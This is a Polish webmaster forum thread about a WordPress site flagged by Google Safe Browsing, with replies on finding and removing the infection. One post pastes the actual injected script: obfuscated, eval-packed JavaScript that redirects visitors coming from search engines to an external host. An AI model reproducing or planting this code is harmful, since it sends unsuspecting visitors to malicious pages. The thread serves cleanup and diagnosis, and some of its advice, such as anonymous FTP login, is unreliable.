Witryna zawiera złośliwe oprogramowanie

[D3eX]

Z kolei u mnie wyświetla.

Witryna ---.pl zawiera złośliwe oprogramowanie. Otwarcie tej witryny grozi zainfekowaniem komputera wirusem.

Według informacji Google kontynuowanie grozi zainstalowaniem na komputerze złośliwego oprogramowania. Jeśli witryna już była odwiedzana lub jest zaufana, istnieje możliwość, że niedawno doszło do włamania do niej przez hakera. W tej chwili odradzamy kontynuowanie – możesz spróbować ponownie jutro albo przejść do innej witryny.

Powiadomiliśmy już właściciela witryny ---.pl, że znaleźliśmy w niej złośliwe oprogramowanie. Więcej informacji na temat problemów stwierdzonych pod adresem---.pl zawiera Strona diagnostyczna Safe Browsing Google.

Oraz

Bezpieczne przeglądanie

Strona diagnostyczna witryny

---.pl

Jaki jest obecny stan bezpieczeństwa witryny---.pl?

Witryna została uznana za podejrzaną – jej odwiedzanie może stanowić zagrożenie dla komputera.

W ciągu ostatnich 90 dni część tej witryny została odnotowana z uwagi na podejrzane działania następującą liczbę razy: 2.

Co się stało podczas odwiedzin tej witryny przez Google?

W ciągu ostatnich 90 dni przetestowaliśmy w tej witrynie następującą liczbę stron: 2. Wyświetlanie 1 z nich spowodowało pobranie i zainstalowanie złośliwego oprogramowania bez zgody użytkownika. Witryna ta po raz ostatni była odwiedzana przez Google 2012-09-06, a po raz ostatni znaleziono w niej podejrzane treści 2012-08-19.

Złośliwe oprogramowanie obejmuje 4 scripting exploit(s).

Złośliwe oprogramowanie działa w następującej liczbie domen: 1, m.in.

googosearch.biz/

.

Ta witryna działała w następującej liczbie sieci: 1, m.in.

AS24940 (HETZNER)

.

Czy ta witryna pośredniczyła w rozpowszechnianiu złośliwego oprogramowania?

Nie wydaje się, aby w ciągu ostatnich 90 dni witryna ---.pl pośredniczyła w zarażaniu jakichkolwiek witryn.

Czy w tej witrynie działało złośliwe oprogramowanie?

Nie, w ciągu ostatnich 90 dni nie było w tej witrynie złośliwego oprogramowania.

Jak do tego doszło?

W pewnych przypadkach osoby trzecie mogą dodawać do legalnych witryn złośliwy kod, który spowoduje wyświetlanie przez nas komunikatu ostrzegawczego.

Dalsze czynności:

• Wróć do poprzedniej strony.
  
• Jeśli witryna należy do Ciebie, możesz zwrócić się o sprawdzenie jej za pomocą Narzędzi Google dla webmasterów. Więcej informacji na temat procesu sprawdzania można znaleźć w Centrum pomocy Google dla webmasterów
  

Macie jakieś pomysły co tutaj zrobić ?

[SzlafRock]

Macie jakieś pomysły co tutaj zrobić ?

To samo co w poprzednich postach było poruszane.

Sprawdzić pliki czy nie został doklejony jakiś kod.

[Huggo]

Plik .htaccess oraz z rozszerzeniami .php, .html i .htm mają zaraz praktycznie zawsze po <body> komentarz który jest wychwycony jako wirus. Dodatkowo Jeśli masz zainstalowanego antywirusa na kompie skopiuj wszystkie pliki .js na kompa i zobacz na którym wyskoczy Ci informacja, że jest zainfekowany. Możesz go usunąć z serwera patrząc czy nie ucierpiała na tym jakaś funkcja. Jeśli ucierpiała zawsze masz możliwość pobrania go z neta i wrzucenia "czystego". Wirus prawdopodobnie wszedł Ci na serwer ponieważ masz w programie totalcommander lub filezilla zapamiętane hasło do FTP'a, a niektóre z wirusów wchodzą przez te klienty FTP wrzucając w kod strony dodatkowe linijki kodu. Jeśli uporasz się z wirusem zmień natychmiast hasło do FTP'a. Jeżeli tego nie zrobisz znowu on powróci. Dodatkowo użyj opcji anonimowego logowania się przez klienty typu totalcommander lub filezilla. Najlepiej także jest po usunięciu wirusa zgłosić stronę do ponownego rozpatrzenia w GWT.

[D3eX]

Pliki .js przeskanowane i brak komunikatu o wirusie, w pliku .htaccess tez brak doklejonego kodu. Hasło zostało już zmienione i nie będzie zapisywane. Co do sprawdzenia plików .js to jest opcja sprawdzenia konkretnego bo troche ich jest.

Skrypt to wordpress

Info google :

Stanowczo zalecamy natychmiastowe zbadanie tej sprawy w celu ochrony użytkowników. Właściciele niektórych witryn celowo rozpowszechniają złośliwe oprogramowanie, jednak w wielu przypadkach webmaster o niczym nie wie, ponieważ:

1) Zabezpieczenia witryny zostały naruszone.

2) Witryna nie jest monitorowana pod kątem złośliwej zawartości pochodzącej od użytkowników.

3) W witrynie jest wyświetlana zawartość pochodząca z sieci reklamowej używanej przez reklamodawcę rozprzestrzeniającego złośliwe oprogramowanie.

[SzlafRock]

Trudno jest stwierdzić, który to konkretnie plik. Jeśli instalowałeś ostatnio pluginy lub templatkę to może być przyczyna.

Sprawdź też datę zapisu pliku na serwerze.

[_Brutus]

Poprzeglądaj sobie daty ostatniej modyfikacji plików. Jeśli nic nie zmieniałeś, to zainfekowany plik będzie miał dość aktualną datę modyfikacji, sporo nowszą niż reszta plików.

[Beerbant]

https://sitecheck.sucuri.net/scanner/

sprawdź w panelu webmasterów komunikaty jak nic nie ma to wyslij info o ponowne zbadania, może masz pecha i wrzuciło stronę na skutek jakiegoś błędu bo skanery nic nie wykrywają

[_Brutus]

To nie błąd, po wejściu na stronę automatycznie instaluje się Security Scanner 2012.

[D3eX]

Known javascript malware.

Details: https://sucuri.net/malware/entry/MW:JS:DEPACK

<!--scounter--><script language="JavaScript">eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script><br class="clear" />

Mamy takie coś tutaj.

[Robbieriviera]

Jak ktoś z was używa sociable z pełna listą portali social, to tam jest malware w wersji 4,3.2, natomiast poprawka 4.3.3 rozpiernicza strony, właśnie to g...wno usuwam, z doświadczenia powiem, że G. tez wykrywa strony z sociable jako szkodzące

[_Brutus]

A ja dziś miałem to zainstalować Dzięki za info.

[aragz]

Ja mam czasami problem z Kasperksym...

Często jest tak że Kaspersky uzna jakąs strone za szkodliwą - pierwszy taki przypadek doświadczony na własnej stronie miałem po przenosinach na Joomla, kilka tygodni zaczelu mi wyskakiwac okienko ze strona zawiera phishing. Skanowalem ja wieloma programami a tylko oprogramowanie Kasperksky'ego wyrzucało taki komunikat. W końcu moja cierpliwość sie skończyła i wysłałem maila do prodecenta i tydzień później otrzymałem odpowiedź że komunikat nie powinien sie już wyświetlać i faktycznie poprawili to.. Teraz mam to samo z inna moją stroną która w sieci jest już od 2 lat i nic złego na niej się nie dzieje, żadnych złośliwych kodów a Kasperky wywala komunikat o szkodliwym odsyłaczu - tym razem bez czekania od razu wysłałem maila...